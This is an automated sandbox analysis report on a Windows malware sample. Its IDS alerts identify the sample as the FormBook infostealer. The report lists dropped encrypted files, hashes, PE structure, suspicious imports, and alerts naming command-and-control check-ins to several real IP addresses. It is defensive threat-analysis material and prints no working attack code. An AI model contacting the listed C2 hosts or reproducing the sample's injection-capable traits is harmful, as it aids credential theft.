Process:	C:\Windows\SysWOW64\DevicePairingWizard.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut139.tmp

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_466.exe
File Type:	data
Category:	dropped
Size (bytes):	275968
Entropy (8bit):	7.995096805205178
Encrypted:	true
SSDEEP:	6144:hJcn/WSaaeS2N0ZgWMUi2Ke7Eg+QJBson6w2N9MjBIw6:hEOaepMg8f+QJBso6p9w6
MD5:	1FA8E604DAFB9C910C21F4946B3D1B5A
SHA1:	6245916A167F9DF5A021CC36C37BE0BA0C734255
SHA-256:	8735156B9D7DF4EF7E0485133E237750012272D6B49CBE16E20CB49A619D58A2
SHA-512:	2BE5694C9AB928FA8BDAEDFD4B09EA69144C3E0D249008E7ED5C5E9CF258B7B82447D93ADE09AD22BB0D799E963C91D710B17D7576CF4DA6D4E743DE730EBA83
Malicious:	false
Reputation:	low
Preview:	x.q..MN2W..\.....XL...iU=...DMN2WEVIUJEQE8MXOG74AV5S4KDMN2.EVI[U._E.D.n.6x.wa;]8d=<]077$u)$?+W9x-".F48.:Zk....:2,{GH[a8MXOG748W<..+#.sR0.k)2._...w8(.-...3S.^...k%1..#&9xX.OG74AV5Sd.DM.3VE2..*EQE8MXOG.4CW>R?KDiJ2WEVIUJEQ.,MXOW74A.1S4K.MN"WEVKUJCQE8MXOG14AV5S4KD.J2WGVIUJEQG8..OG'4AF5S4KTMN"WEVIUJUQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQkL( ;G74.t1S4[DMN.SEVYUJEQE8MXOG74AV.S4+DMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVI

C:\Users\user\AppData\Local\Temp\aut169.tmp

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_466.exe
File Type:	data
Category:	dropped
Size (bytes):	11818
Entropy (8bit):	7.712826250933502
Encrypted:	false
SSDEEP:	192:LDIZM0MiO/HCDzg7HtE7a5A3FD+1Qa9aou83mfmU45kantrFICbh52g:LDIDxDDzgDt4ae3xaVp3me1kOthlh59
MD5:	08446D48339A5B92538172AD74C0375E
SHA1:	0A259EA406CAD4F38432D4318A68DD795514DC78
SHA-256:	3628113EDBC62361A41B9393F73A29F4846C12D8FB9E5AAA61F9BFF88148456C
SHA-512:	948511E695A8DBE592363DE0260B55EC58F2080DD7F17F723950B76C0F057F1CD5DBB6CBF294BE9BB70BE46A8B61D9DD54A08EC3659C60767CA5300A743E0AC1
Malicious:	false
Reputation:	low
Preview:	EA06......[......p..-_.K..p........p......7\|=..!..i.....1........p..=..C............j....... ...$....$..Z......l.@2...p...6}@.@.c.....>...P...@->.......6[@.O....@6 .`.....l`....l...c............. ...G..`7@.....6....@....p.a..r}.NN....0.@<>..........>.........f>.........0>.........w`..........@0...Fw..........}`.@.#..$..>..Ch.....@x...!..T...5O.....~`....S..$5`j..........@5O..`.........z\|`.........o-........$? /O..R..H}../O....H}../O.~.!..H;.GO..s..........:\|.\|.v......:\|.\|.~.........0.).;O..Q..d.I.....{......{..6}.{..X...0...$.............gh...............~.@......lt....'..0n.i?M F..i>. F...H.h~.9P.g.........hgj...iB42.I..B44.I.iB4?P..N......4.>.+z.....@#E..x.....`.*.`w`...G......c.......=.....#......~`.c....`.@.,\|`....c....... ........2..... ......a..p,.!o._.................(..H.0..p...........X\|!... ....@!.....G..........,................X};@...N..o... ..w......v...V.......#....B7........V.......N...o.B6....\|.....t.a...@... .5.1.m.B>......`..r..........#

C:\Users\user\AppData\Local\Temp\inhumation

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_466.exe
File Type:	data
Category:	dropped
Size (bytes):	275968
Entropy (8bit):	7.995096805205178
Encrypted:	true
SSDEEP:	6144:hJcn/WSaaeS2N0ZgWMUi2Ke7Eg+QJBson6w2N9MjBIw6:hEOaepMg8f+QJBso6p9w6
MD5:	1FA8E604DAFB9C910C21F4946B3D1B5A
SHA1:	6245916A167F9DF5A021CC36C37BE0BA0C734255
SHA-256:	8735156B9D7DF4EF7E0485133E237750012272D6B49CBE16E20CB49A619D58A2
SHA-512:	2BE5694C9AB928FA8BDAEDFD4B09EA69144C3E0D249008E7ED5C5E9CF258B7B82447D93ADE09AD22BB0D799E963C91D710B17D7576CF4DA6D4E743DE730EBA83
Malicious:	false
Reputation:	low
Preview:	x.q..MN2W..\.....XL...iU=...DMN2WEVIUJEQE8MXOG74AV5S4KDMN2.EVI[U._E.D.n.6x.wa;]8d=<]077$u)$?+W9x-".F48.:Zk....:2,{GH[a8MXOG748W<..+#.sR0.k)2._...w8(.-...3S.^...k%1..#&9xX.OG74AV5Sd.DM.3VE2..*EQE8MXOG.4CW>R?KDiJ2WEVIUJEQ.,MXOW74A.1S4K.MN"WEVKUJCQE8MXOG14AV5S4KD.J2WGVIUJEQG8..OG'4AF5S4KTMN"WEVIUJUQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQkL( ;G74.t1S4[DMN.SEVYUJEQE8MXOG74AV.S4+DMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVIUJEQE8MXOG74AV5S4KDMN2WEVI

C:\Users\user\AppData\Local\Temp\supergroups

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002B_466.exe
File Type:	Unicode text, UTF-8 text, with very long lines (29698), with no line terminators
Category:	dropped
Size (bytes):	59396
Entropy (8bit):	3.2461301503975952
Encrypted:	false
SSDEEP:	384:XRcScPkiE+MKwH91Hr+oqCs7XleLfXZJWDU2HvRez97ZJJ1beuzs6H:XXcPkf+Wd9r+seXleLf52Hpc97ZJJtH
MD5:	959AAA0B4566AA5615DF7CB2C364394C
SHA1:	6CF7FCC9EB4F1FA79A3E6A397872FBB5C37C0859
SHA-256:	78F6C788612DCC2626E13498E32BF56296137B7388B9501A00A262E3042F3F40
SHA-512:	E8BA6702B1964354B6649EE63AE37BC29ACA059A6B3D43ECAE53A10BA9F3A58B27E33D99240F4C1E2E7D9D3BDED989F2BF4803E72BF4331D865728A878CDFA95
Malicious:	false
Reputation:	low
Preview:	....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.109584447527337
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002B_466.exe
File size:	1'161'737 bytes
MD5:	cc75546dca8931513952d924791b54f0
SHA1:	cdda63091a813cac9da8292d871fd1d1c403c3d4
SHA256:	0d2bd5b1931e12154a0d298b8d30d7ebe712809830b70635f0320b801c2cc7be
SHA512:	8531cd8146bb5b56133d5f15fbb42b698fe2fc23f5474ef59afa1cb4336b85f742acca1b758de5d5fc76df0d43f4d33769957e5ff50a6b3d9227b6297bb12ebb
SSDEEP:	24576:nAHnh+eWsN3skA4RV1Hom2KXMmHaVHZ7H/thUdaSIrR5:ah+ZkldoPK8YaVHZ7ltDv
TLSH:	BC35BD0273D2D036FFAB92739B6AF60556BC79254123852F13981DB9BD701B2223E763
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65FB7C14 [Thu Mar 21 00:15:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FBA2C8E3B3Dh
jmp 00007FBA2C8D68F4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FBA2C8D6A7Ah
cmp edi, eax
jc 00007FBA2C8D6DDEh
bt dword ptr [004C41FCh], 01h
jnc 00007FBA2C8D6A79h
rep movsb
jmp 00007FBA2C8D6D8Ch
cmp ecx, 00000080h
jc 00007FBA2C8D6C44h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FBA2C8D6A80h
bt dword ptr [004BF324h], 01h
jc 00007FBA2C8D6F50h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FBA2C8D6C1Dh
test edi, 00000003h
jne 00007FBA2C8D6C2Eh
test esi, 00000003h
jne 00007FBA2C8D6C0Dh
bt edi, 02h
jnc 00007FBA2C8D6A7Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FBA2C8D6A83h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FBA2C8D6AD5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x512f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11a000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x512f0	0x51400	048941a2ba72d54391e5ec6207a7a236	False	0.9189723557692308	data	7.874928228931805	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11a000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x485b8	data			1.0003407833292843
RT_GROUP_ICON	0x118d70	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x118de8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x118dfc	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x118e10	0x14	data	English	Great Britain	1.25
RT_VERSION	0x118e24	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x118f00	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T12:09:49.922415+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49744	80	192.168.2.5	67.198.129.29
2024-07-25T12:06:52.373062+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49704	40.68.123.157	192.168.2.5
2024-07-25T12:09:46.874627+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49743	80	192.168.2.5	67.198.129.29
2024-07-25T12:10:37.646592+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49756	80	192.168.2.5	104.21.25.75
2024-07-25T12:09:40.913870+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49742	80	192.168.2.5	66.96.162.141
2024-07-25T12:07:09.523761+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49712	80	192.168.2.5	74.208.236.162
2024-07-25T12:08:35.120347+0200	TCP	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	49729	80	192.168.2.5	67.223.117.189
2024-07-25T12:07:32.998238+0200	TCP	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	49717	80	192.168.2.5	89.31.143.90
